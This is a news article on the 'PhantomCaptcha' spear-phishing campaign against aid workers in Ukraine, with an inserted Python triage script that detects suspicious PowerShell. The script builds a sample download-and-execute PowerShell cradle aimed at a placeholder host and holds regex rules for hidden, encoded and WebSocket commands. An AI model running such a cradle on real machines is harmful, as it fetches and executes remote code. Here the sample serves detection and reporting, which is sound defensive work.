Kyiv – In the midst of Ukraine’s ongoing war, a new cyber threat has quietly emerged, this time aimed not at soldiers or infrastructure but at those trying to help.
According to a report released Wednesday by SentinelOne, a sophisticated spear-phishing campaign—codenamed “PhantomCaptcha”—has targeted members of international aid and humanitarian organizations operating in Ukraine. The victims included personnel from the International Red Cross, UNICEF’s Ukraine office, the Norwegian Refugee Council, and even regional government administrators in Donetsk, Poltava, Dnipropetrovsk, and Mykolaiv.
The attackers, posing as representatives of the Ukrainian President’s Office, sent out booby-trapped PDF invitations to what appeared to be official Zoom meetings. The documents contained embedded links to a fake conferencing portal, “zoomconference[.]app,” that mimicked the real Zoom website.
“This campaign demonstrates a chilling fusion of social engineering and technical precision,” said Tom Hegel, a senior threat researcher at SentinelOne. “It shows how humanitarian channels have become the new vector for digital espionage.”
A Weaponized PDF and a Deceptive CAPTCHA
Once victims clicked the link, they were met with a fake Cloudflare CAPTCHA page, designed to look like a harmless security check. Instead, it executed an obfuscated PowerShell command, triggering a multi-stage infection chain.
The downloader contacted Russian-owned infrastructure, retrieved additional payloads, and installed a custom WebSocket-based remote access trojan (RAT)—a stealthy backdoor granting attackers full control of the victim’s device.
The RAT communicated through encrypted WebSocket connections, enabling remote command execution, data exfiltration, and potential deployment of further malware. The system was designed with layers of deception: the fake CAPTCHA acted as a relay between the victim’s machine and the command server, while a real password-protected Zoom page was shown in parallel to make the attack appear legitimate.
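The chain described above (fake CAPTCHA, obfuscated PowerShell, staged download, WebSocket backdoor) leaves a recognisable footprint in process-creation telemetry. The following is an added example, not code from the SentinelOne report: a small Python triage that decodes `-EncodedCommand` payloads and scores PowerShell command lines for the traits involved. The events, the URL and the rule weights are constructed for illustration.

```python
import base64
import re

# Constructed sample: the kind of download cradle a fake CAPTCHA page tricks a user
# into running. Hypothetical URL, not an indicator from the SentinelOne report.
_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('https://stage.example.invalid/s2.ps1')"
_ENCODED = base64.b64encode(_CRADLE.encode("utf-16le")).decode()

# Constructed process-creation events as (parent image, command line).
SAMPLE_EVENTS = [
    ("explorer.exe", f"powershell.exe -nop -w hidden -ep bypass -enc {_ENCODED}"),
    ("explorer.exe", "powershell.exe -NoProfile -Command Get-ChildItem C:\\Users"),
    ("cmd.exe", 'powershell.exe -c "$ws = New-Object Net.WebSockets.ClientWebSocket"'),
    ("services.exe", "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"),
]

# (rule name, case-insensitive regex over the decoded command line, weight)
RULES = [
    ("hidden_window", r"-w(?:indowstyle)?\s+hidden", 2),
    ("encoded_command", r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", 2),
    ("policy_bypass", r"-e(?:p|xecutionpolicy)\s+bypass", 1),
    ("download_cradle", r"(?:iex|invoke-expression).*(?:downloadstring|invoke-webrequest|\biwr\b|net\.webclient)", 3),
    ("websocket_client", r"net\.websockets\.clientwebsocket", 3),
]

def decode_encoded(cmdline):
    """Append the decoded payload of an -enc/-EncodedCommand argument (base64 of UTF-16LE)."""
    m = re.search(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", cmdline, re.I)
    if not m:
        return cmdline
    try:
        return cmdline + " " + base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return cmdline  # not valid base64/UTF-16: leave the raw line for the rules

def score(cmdline):
    """Return (total weight, matched rule names) for one PowerShell command line."""
    text = decode_encoded(cmdline)
    hits = [name for name, pat, _ in RULES if re.search(pat, text, re.I)]
    return sum(w for name, _, w in RULES if name in hits), hits

def triage(events, threshold=3):
    """Return (parent, score, hits) for events scoring >= threshold, highest first."""
    flagged = []
    for parent, cmd in events:
        total, hits = score(cmd)
        if total >= threshold:
            flagged.append((parent, total, hits))
    return sorted(flagged, key=lambda row: -row[1])
```

Running `triage(SAMPLE_EVENTS)` flags the hidden, encoded download cradle and the WebSocket client, while the routine directory listing and the scheduled backup script stay below threshold.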
“It’s a strikingly well-crafted blend of technology and timing,” Hegel added. “Everything about this operation—from the fake conferencing domain to the short-lived infrastructure—points to experienced operators with strong operational security.”
From Planning to Execution: Six Months of Preparation
Investigators discovered that the PhantomCaptcha infrastructure was in the works for over six months. The attackers registered domains such as “goodhillsenterprise[.]com” back in March 2025 to host malicious scripts, while “zoomconference[.]app”—the fake meeting site—was activated for only one day: October 8, 2025, the day of the attacks.
The one-day activation suggests tight control and deliberate exposure limits—hallmarks of a threat actor well-versed in compartmentalized operations. SentinelOne’s telemetry also revealed fake Android applications hosted on a companion site, “princess-mens[.]click,” that collected geolocation data, contacts, and call logs—indicating a multi-platform surveillance ecosystem.
Although no group has been formally blamed, SentinelOne noted tactical overlaps with COLDRIVER, a Russia-linked hacking outfit previously tied to credential phishing operations against NATO officials and journalists.
Humanitarian Targets in the Crosshairs
This latest intrusion adds to a growing pattern: hackers targeting aid and relief groups amid wartime instability. Experts say such operations aim not only to steal information but also to disrupt the digital logistics of humanitarian response, from donor communications to field coordination.
“The humanitarian sector has become the soft underbelly of modern conflict,” said a cybersecurity official familiar with Ukraine’s digital defense programs. “Threat actors know that aid groups lack the same infrastructure and budget as governments or defense agencies, yet they handle highly sensitive data.”
For Ukraine’s allies and international organizations, the implications are serious: data from relief agencies often includes personal details of displaced civilians, donor accounts, and cross-border supply information—all valuable intelligence in a hybrid war environment.
A Warning for the Global Aid Ecosystem
PhantomCaptcha’s brief but well-orchestrated campaign illustrates the changing face of cyberwarfare: small, controlled, and surgically targeted. The combination of social engineering, Zoom mimicry, and PowerShell-based remote access shows how traditional malware has evolved into multi-layered psychological operations.
SentinelOne described the campaign as “a masterclass in operational discipline.” The attackers appeared, struck, and vanished—taking down visible domains within hours while maintaining backend command servers for continued monitoring.
“It’s not just about stealing data,” said Hegel. “It’s about eroding trust in the very systems we use to collaborate and communicate in crises.”
For aid workers across Eastern Europe, that erosion may be the most dangerous weapon of all.
